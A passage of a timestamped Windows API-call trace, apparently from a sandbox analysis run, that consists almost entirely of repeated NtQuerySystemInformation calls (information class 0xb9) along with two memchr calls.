SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.307] memchr (_Buf=0x27fc98d9fdd, _Val=0, _MaxCount=0x132) returned 0x27fc98d9fe5 [0188.307] memchr (_Buf=0x27fc98d9fe6, _Val=0, _MaxCount=0x129) returned 0x27fc98d9fee [0188.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfc8, Length=0x38, ResultLength=0x0) [0188.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0188.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0188.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe080, Length=0x20, ResultLength=0x0) [0188.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0188.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde90, Length=0x20, ResultLength=0x0) [0188.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde20, Length=0x20, ResultLength=0x0) [0188.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde20, Length=0x20, ResultLength=0x0) [0188.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0188.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0188.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0188.681] NtQuerySystemInformation (SystemInformationClass=0xb9, 